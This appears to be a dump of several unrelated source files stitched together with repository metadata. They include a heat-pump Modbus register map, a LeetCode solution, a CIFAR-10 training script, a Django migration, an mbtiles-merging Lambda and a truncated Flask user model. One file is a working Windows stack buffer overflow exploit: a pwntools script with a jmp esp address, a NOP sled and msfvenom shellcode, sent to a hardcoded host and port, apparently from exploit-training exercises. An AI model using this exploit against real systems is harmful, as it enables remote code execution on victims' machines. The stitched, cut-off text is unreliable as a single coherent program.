{ KEY_ADDRESS: 210, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_3:
{ KEY_ADDRESS: 211, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_3:
{ KEY_ADDRESS: 212, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_3:
{ KEY_ADDRESS: 213, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_3:
{ KEY_ADDRESS: 214, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_3:
{ KEY_ADDRESS: 215, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_3:
{ KEY_ADDRESS: 216, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_4:
{ KEY_ADDRESS: 239, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_4:
{ KEY_ADDRESS: 240, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_4:
{ KEY_ADDRESS: 241, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_4:
{ KEY_ADDRESS: 242, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_4:
{ KEY_ADDRESS: 243, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_4:
{ KEY_ADDRESS: 244, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_4:
{ KEY_ADDRESS: 245, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_4:
{ KEY_ADDRESS: 246, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_4:
{ KEY_ADDRESS: 247, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_5:
{ KEY_ADDRESS: 248, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_5:
{ KEY_ADDRESS: 249, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_5:
{ KEY_ADDRESS: 250, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_5:
{ KEY_ADDRESS: 251, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_5:
{ KEY_ADDRESS: 252, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_5:
{ KEY_ADDRESS: 253, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_5:
{ KEY_ADDRESS: 254, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_5:
{ KEY_ADDRESS: 255, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_5:
{ KEY_ADDRESS: 256, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_RETURN_TEMP_FROM_POOL_TO_HEAT_EXCHANGER:
{ KEY_ADDRESS: 299, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_POOL_HYSTERESIS:
{ KEY_ADDRESS: 300, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_FOR_SUPPLY_LINE_TEMP_PASSIVE_COOLING_WITH_MIXING_VALVE_1:
{ KEY_ADDRESS: 302, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_MINIMUM_OUTDOOR_TEMP_WHEN_COOLING_IS_PERMITTED:
{ KEY_ADDRESS: 303, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_EXTERNAL_HEATER_OUTDOOR_TEMP_LIMIT:
{ KEY_ADDRESS: 304, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_2:
{ KEY_ADDRESS: 305, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_2:
{ KEY_ADDRESS: 306, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_2:
{ KEY_ADDRESS: 307, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_2:
{ KEY_ADDRESS: 308, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_3:
{ KEY_ADDRESS: 309, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_3:
{ KEY_ADDRESS: 310, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_3:
{ KEY_ADDRESS: 311, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_3:
{ KEY_ADDRESS: 312, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_4:
{ KEY_ADDRESS: 313, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_4:
{ KEY_ADDRESS: 314, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_4:
{ KEY_ADDRESS: 315, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_TEMP_MIXING_VALVE_4:
{ KEY_ADDRESS: 316, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_5:
{ KEY_ADDRESS: 317, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_5:
{ KEY_ADDRESS: 318, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_5:
{ KEY_ADDRESS: 319, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_5:
{ KEY_ADDRESS: 320, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
}
| 1.820313
| 2
|
src/infrastructure/utils/utils.py
|
YegorMedvedev/python-onion-scaffold
| 1
|
12775565
|
<filename>src/infrastructure/utils/utils.py
import os
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
def get_port() -> int:
assert os.getenv("PORT") is not None
config_port = int(os.getenv("PORT"))
if os.getenv("ENV") == "test":
return config_port + 1000
else:
return config_port
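# Illustrative usage sketch (not part of the original module; the class name and
# values below are hypothetical): Singleton as a metaclass guarantees a single
# shared instance, and get_port() reads PORT from the environment.
if __name__ == "__main__":
    class AppConfig(metaclass=Singleton):
        pass

    assert AppConfig() is AppConfig()  # always the same instance
    os.environ.setdefault("PORT", "8000")
    print(get_port())  # 8000, or 9000 when ENV == "test"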
| 2.515625
| 3
|
1-stack-overflows/dostackbufferoverflowgood/exploit.py
|
anvbis/windows-exp
| 0
|
12775566
|
#!/usr/bin/env python3
from pwn import *
padding = b'\x41' * 146
nops = b'\x90' * 128
# msfvenom -p windows/exec -b '\x00\x0a' -f python CMD=calc.exe
shellcode = b""
shellcode += b"\xba\xe8\x19\x31\x9d\xda\xda\xd9\x74\x24\xf4\x5e\x2b"
shellcode += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xe7\xfb"
shellcode += b"\xc4\x61\x1f\x79\x26\x9a\xdf\x1e\xae\x7f\xee\x1e\xd4"
shellcode += b"\xf4\x40\xaf\x9e\x59\x6c\x44\xf2\x49\xe7\x28\xdb\x7e"
shellcode += b"\x40\x86\x3d\xb0\x51\xbb\x7e\xd3\xd1\xc6\x52\x33\xe8"
shellcode += b"\x08\xa7\x32\x2d\x74\x4a\x66\xe6\xf2\xf9\x97\x83\x4f"
shellcode += b"\xc2\x1c\xdf\x5e\x42\xc0\x97\x61\x63\x57\xac\x3b\xa3"
shellcode += b"\x59\x61\x30\xea\x41\x66\x7d\xa4\xfa\x5c\x09\x37\x2b"
shellcode += b"\xad\xf2\x94\x12\x02\x01\xe4\x53\xa4\xfa\x93\xad\xd7"
shellcode += b"\x87\xa3\x69\xaa\x53\x21\x6a\x0c\x17\x91\x56\xad\xf4"
shellcode += b"\x44\x1c\xa1\xb1\x03\x7a\xa5\x44\xc7\xf0\xd1\xcd\xe6"
shellcode += b"\xd6\x50\x95\xcc\xf2\x39\x4d\x6c\xa2\xe7\x20\x91\xb4"
shellcode += b"\x48\x9c\x37\xbe\x64\xc9\x45\x9d\xe2\x0c\xdb\x9b\x40"
shellcode += b"\x0e\xe3\xa3\xf4\x67\xd2\x28\x9b\xf0\xeb\xfa\xd8\x0f"
shellcode += b"\xa6\xa7\x48\x98\x6f\x32\xc9\xc5\x8f\xe8\x0d\xf0\x13"
shellcode += b"\x19\xed\x07\x0b\x68\xe8\x4c\x8b\x80\x80\xdd\x7e\xa7"
shellcode += b"\x37\xdd\xaa\xc4\xd6\x4d\x36\x25\x7d\xf6\xdd\x39"
payload = flat(
padding,
p32(0x080414c3), # jmp esp;
nops, shellcode
)
with remote('192.168.122.186', 31337) as r:
r.writeline(payload)
| 1.554688
| 2
|
main.py
|
enesdemirag/cifar10-classification
| 1
|
12775567
|
<gh_stars>1-10
import os
import warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
warnings.filterwarnings("ignore", category=FutureWarning)
warnings.filterwarnings("ignore", category=UserWarning)
from preprocessing import get_data_from_tensorflow
from models import MLP
import matplotlib.pyplot as plt
import numpy as np
import random
# Preprocessing
images_train, labels_train, images_test, labels_test = get_data_from_tensorflow()
# Creating models
mlp = MLP()
# Training MLP Model
mlp.train(images_train, labels_train)
# Testing MLP Model
loss, precision, recall, accuracy, auc = mlp.test(images_test, labels_test)
_ , ax = plt.subplots(5, 1, figsize=(15, 5))
ax[0].set_xlabel("Epoch")
ax[0].set_ylabel("Value")
ax[0].set_title("Loss")
ax[1].set_xlabel("Epoch")
ax[1].set_ylabel("Value")
ax[1].set_title("Presicion")
ax[2].set_xlabel("Epoch")
ax[2].set_ylabel("Value")
ax[2].set_title("Recall")
ax[3].set_xlabel("Epoch")
ax[3].set_ylabel("Value")
ax[3].set_title("Accuracy")
ax[4].set_xlabel("Epoch")
ax[4].set_ylabel("Value")
ax[4].set_title("AUC")
ax[0].plot(mlp.epochs[1:], mlp.hist["loss"][1:], color="r")
ax[1].plot(mlp.epochs[1:], mlp.hist["precision"][1:], color="g")
ax[2].plot(mlp.epochs[1:], mlp.hist["recall"][1:], color="b")
ax[3].plot(mlp.epochs[1:], mlp.hist["accuracy"][1:], color="k")
ax[4].plot(mlp.epochs[1:], mlp.hist["auc"][1:], color="y")
plt.savefig("finalmodel.png")
plt.show()
mlp.save()
| 2.53125
| 3
|
submissions/bulls-and-cows/solution.py
|
Wattyyy/LeetCode
| 0
|
12775568
|
# https://leetcode.com/problems/bulls-and-cows
class Solution:
def getHint(self, secret, guess):
s_used, g_used = set(), set()
bull = 0
for idx, (s_char, g_char) in enumerate(zip(secret, guess)):
if s_char == g_char:
bull += 1
s_used.add(idx)
g_used.add(idx)
print(s_used)
print(g_used)
cow = 0
for i, s_char in enumerate(secret):
for j, g_char in enumerate(guess):
if (s_char == g_char) and (i not in s_used) and (j not in g_used):
cow += 1
s_used.add(i)
g_used.add(j)
print(s_used)
print(g_used)
return "{}A{}B".format(bull, cow)
| 3.421875
| 3
|
src/travel/migrations/0001_initial.py
|
dakrauth/travel
| 5
|
12775569
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from django.conf import settings
import travel.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='TravelBucketList',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=100)),
('is_public', models.BooleanField(default=True)),
('description', models.TextField(blank=True)),
('last_update', models.DateTimeField(auto_now=True)),
],
options={
'db_table': 'travel_bucket_list',
},
),
migrations.CreateModel(
name='TravelCurrency',
fields=[
('iso', models.CharField(max_length=4, serialize=False, primary_key=True)),
('name', models.CharField(max_length=50)),
('fraction', models.CharField(max_length=8, blank=True)),
('fraction_name', models.CharField(max_length=15, blank=True)),
('sign', models.CharField(max_length=4, blank=True)),
('alt_sign', models.CharField(max_length=4, blank=True)),
],
options={
'db_table': 'travel_currency',
},
),
migrations.CreateModel(
name='TravelEntity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('geonameid', models.IntegerField(default=0)),
('code', models.CharField(max_length=6, db_index=True)),
('name', models.CharField(max_length=175)),
('full_name', models.CharField(max_length=175)),
('lat', models.DecimalField(null=True, max_digits=7, decimal_places=4, blank=True)),
('lon', models.DecimalField(null=True, max_digits=7, decimal_places=4, blank=True)),
('category', models.CharField(max_length=4, blank=True)),
('locality', models.CharField(max_length=256, blank=True)),
('tz', models.CharField(max_length=40, verbose_name=b'timezone', blank=True)),
('capital', models.ForeignKey(on_delete=django.db.models.SET_NULL, related_name='capital_set', blank=True, to='travel.TravelEntity', null=True)),
('continent', models.ForeignKey(on_delete=django.db.models.SET_NULL, related_name='continent_set', blank=True, to='travel.TravelEntity', null=True)),
('country', models.ForeignKey(on_delete=django.db.models.SET_NULL, related_name='country_set', blank=True, to='travel.TravelEntity', null=True)),
],
options={
'ordering': ('name',),
'db_table': 'travel_entity',
},
),
migrations.CreateModel(
name='TravelEntityInfo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('iso3', models.CharField(max_length=3, blank=True)),
('denom', models.CharField(max_length=40, blank=True)),
('denoms', models.CharField(max_length=60, blank=True)),
('language_codes', models.CharField(max_length=100, blank=True)),
('phone', models.CharField(max_length=20, blank=True)),
('electrical', models.CharField(max_length=40, blank=True)),
('postal_code', models.CharField(max_length=60, blank=True)),
('tld', models.CharField(max_length=8, blank=True)),
('population', models.IntegerField(default=None, null=True, blank=True)),
('area', models.IntegerField(default=None, null=True, blank=True)),
('currency', models.ForeignKey(on_delete=django.db.models.SET_NULL, blank=True, to='travel.TravelCurrency', null=True)),
('entity', models.OneToOneField(on_delete=django.db.models.CASCADE, related_name='entityinfo', to='travel.TravelEntity')),
],
options={
'db_table': 'travel_entityinfo',
},
),
migrations.CreateModel(
name='TravelEntityType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('abbr', models.CharField(max_length=4, db_index=True)),
('title', models.CharField(max_length=25)),
],
options={
'db_table': 'travel_entitytype',
},
),
migrations.CreateModel(
name='TravelFlag',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('source', models.CharField(max_length=255)),
('base_dir', models.CharField(max_length=8)),
('ref', models.CharField(max_length=6)),
('thumb', models.ImageField(blank=True)),
('large', models.ImageField(blank=True)),
('svg', models.FileField(upload_to=travel.models.svg_upload, blank=True)),
('is_locked', models.BooleanField(default=False)),
],
options={
'db_table': 'travel_flag',
},
),
migrations.CreateModel(
name='TravelLanguage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('iso639_1', models.CharField(max_length=2, blank=True)),
('iso639_2', models.CharField(max_length=12, blank=True)),
('iso639_3', models.CharField(max_length=3, blank=True)),
('name', models.CharField(max_length=60)),
],
),
migrations.CreateModel(
name='TravelLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('arrival', models.DateTimeField()),
('rating', models.PositiveSmallIntegerField(default=3, choices=[(1, b'★★★★★'), (2, b'★★★★'), (3, b'★★★'), (4, b'★★'), (5, b'★')])),
('notes', models.TextField(blank=True)),
('entity', models.ForeignKey(on_delete=django.db.models.CASCADE, to='travel.TravelEntity')),
('user', models.ForeignKey(on_delete=django.db.models.CASCADE, related_name='travellog_set', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-arrival',),
'get_latest_by': 'arrival',
},
),
migrations.CreateModel(
name='TravelProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('access', models.CharField(default='PRO', max_length=3, choices=[('PUB', b'Public'), ('PRI', b'Private'), ('PRO', b'Protected')])),
('user', models.OneToOneField(on_delete=django.db.models.CASCADE, related_name='travel_profile', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'travel_profile',
},
),
migrations.AddField(
model_name='travelentityinfo',
name='languages',
field=models.ManyToManyField(to='travel.TravelLanguage', blank=True),
),
migrations.AddField(
model_name='travelentityinfo',
name='neighbors',
field=models.ManyToManyField(to='travel.TravelEntity', blank=True),
),
migrations.AddField(
model_name='travelentity',
name='flag',
field=models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, to='travel.TravelFlag', null=True),
),
migrations.AddField(
model_name='travelentity',
name='state',
field=models.ForeignKey(on_delete=django.db.models.SET_NULL, related_name='state_set', blank=True, to='travel.TravelEntity', null=True),
),
migrations.AddField(
model_name='travelentity',
name='type',
field=models.ForeignKey(on_delete=django.db.models.PROTECT, related_name='entity_set', to='travel.TravelEntityType'),
),
migrations.AddField(
model_name='travelbucketlist',
name='entities',
field=models.ManyToManyField(to='travel.TravelEntity'),
),
migrations.AddField(
model_name='travelbucketlist',
name='owner',
field=models.ForeignKey(on_delete=django.db.models.SET_NULL, default=None, blank=True, to=settings.AUTH_USER_MODEL, null=True),
),
]
| 1.695313
| 2
|
lambda_functions/process/merge_mbtiles/lambda_function.py
|
hotosm/MapCampaigner
| 24
|
12775570
|
import sys
sys.path.insert(0, 'dependencies')
import boto3
import json
import os
import shutil
from glob import glob
from os.path import join
from sqlite3 import connect
S3 = boto3.client('s3')
BUCKET = os.environ['S3_BUCKET']
CAMPAIGN_TILES = 'campaign.mbtiles'
PATH = '/tmp'
def list_mbtiles(uuid):
mbtiles_folder = 'campaigns/{0}/mbtiles/'.format(uuid)
mbtiles = S3.list_objects_v2(
Bucket=BUCKET,
Prefix=mbtiles_folder
)
mbtiles = [m['Key'] for m in mbtiles['Contents']
if m['Key'].endswith('.mbtiles')]
return mbtiles
def merge_tiles(folder_path, merge_file):
mbtiles = glob('{0}/*.mbtiles'.format(folder_path))
mbtile = mbtiles.pop(0)
shutil.copy(mbtile, merge_file)
dst_conn = connect(merge_file)
dst_cursor = dst_conn.cursor()
query = '''INSERT OR REPLACE INTO
tiles(zoom_level, tile_column, tile_row, tile_data)
VALUES (?,?,?,?);'''
for mbtile in mbtiles:
src_conn = connect(mbtile)
src_cursor = src_conn.cursor()
sql_text = 'SELECT * FROM tiles'
src_cursor.execute(sql_text)
row = src_cursor.fetchone()
while row is not None:
dst_cursor.execute(query, row)
row = src_cursor.fetchone()
dst_conn.commit()
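# Illustrative local usage (hypothetical paths; assumes the folder already holds
# the downloaded .mbtiles files): merge_tiles() copies the first file as the
# base and upserts every tile row from the remaining files via INSERT OR REPLACE.
#
#     merge_tiles('/tmp/<campaign-uuid>', '/tmp/campaign.mbtiles')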
def lambda_handler(event, context):
try:
main(event)
except Exception as e:
error_dict = {'function': 'process_merge_mbtiles', 'failure': str(e)}
key = f'campaigns/{event["uuid"]}/failure.json'
S3.put_object(
Bucket=BUCKET,
Key=key,
Body=json.dumps(error_dict),
ACL='public-read')
def main(event):
uuid = event['uuid']
folder_path = join(PATH, uuid)
if os.path.isdir(folder_path):
shutil.rmtree(folder_path)
os.mkdir(folder_path)
# Download all one by one.
for mbtile in list_mbtiles(uuid):
file_name = mbtile.split('/')[-1]
S3.download_file(BUCKET,
mbtile,
join(folder_path, file_name)
)
# Merge using sqlite.
merge_file = join(PATH, CAMPAIGN_TILES)
merge_tiles(folder_path, merge_file)
key = 'campaigns/{0}/{1}'.format(uuid, CAMPAIGN_TILES)
with open(merge_file, "rb") as data:
S3.upload_fileobj(
Fileobj=data,
Bucket=BUCKET,
Key=key,
ExtraArgs={'ACL': 'public-read'}
)
| 2.265625
| 2
|
back-end/app/models.py
|
guguji123/blog
| 0
|
12775571
|
<gh_stars>0
from app.extensions import db
from werkzeug.security import generate_password_hash, check_password_hash
from flask import url_for, current_app
# import base64
from datetime import datetime, timedelta
import jwt
import hashlib
class PaginatedAPIMixin(object):
@staticmethod
def to_collection_dict(query, page, per_page, endpoint, **kwargs):
resources = query.paginate(page, per_page, False)
data = {
'items': [item.to_dict() for item in resources.items],
'_meta': {
'page': page,
'per_page': per_page,
'total_pages': resources.pages,
'total_items': resources.total
},
'_links': {
'self': url_for(endpoint, page=page, per_page=per_page, **kwargs),
'next': url_for(endpoint, page=page + 1, per_page=per_page, **kwargs) if resources.has_next else None,
'prev': url_for(endpoint, page=page - 1, per_page=per_page, **kwargs) if resources.has_prev else None,
}
}
return data
class User(PaginatedAPIMixin, db.Model):
    # Set the database table name; the author_id foreign key on the Post model references users.id
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
name = db.Column(db.String(64))
location = db.Column(db.String(64))
about_me = db.Column(db.String(64))
member_since = db.Column(db.DateTime(), default=datetime.utcnow)
last_seen = db.Column(db.DateTime(), default=datetime.utcnow)
# token = db.Column(db.String(32), index=True, unique=True)
# token_expiration = db.Column(db.DateTime)
posts = db.relationship('Post', backref='author',
lazy='dynamic', cascade='all, delete-orphan')
def __repr__(self):
return '<User {}>'.format(self.username)
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def avatar(self, size):
        # Gravatar avatar URL
digest = hashlib.md5(self.email.lower().encode('utf-8')).hexdigest()
return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(digest, size)
    # The frontend sends a JSON object that must be converted into a User object
def from_dict(self, data, new_user=False):
for field in ['username', 'email', 'name', 'location', 'about_me']:
if field in data:
setattr(self, field, data[field])
if new_user and 'password' in data:
self.set_password(data['password'])
def to_dict(self, include_email=False):
data = {
'id': self.id,
'username': self.username,
'name': self.name,
'location': self.location,
'about_me': self.about_me,
'member_since': self.member_since.isoformat() + 'Z',
'last_seen': self.last_seen.isoformat() + 'Z',
'_links': {
'self': url_for('api.get_user', id=self.id),
'avatar': self.avatar(128)
}
}
if include_email:
data['email'] = self.email
return data
'''def get_token(self, expire_in=3600):
now = datetime.utcnow()
        if self.token and self.token_expiration > now + timedelta(seconds=60):
return self.token
self.token = base64.b64encode(os.urandom(24)).decode('utf-8')
self.token_expiration = now + timedelta(seconds=expire_in)
db.session.add(self)
return self.token'''
    '''A JWT cannot be revoked (no DELETE /tokens needed); it is only invalidated by expiry, so keep the lifetime short'''
def ping(self):
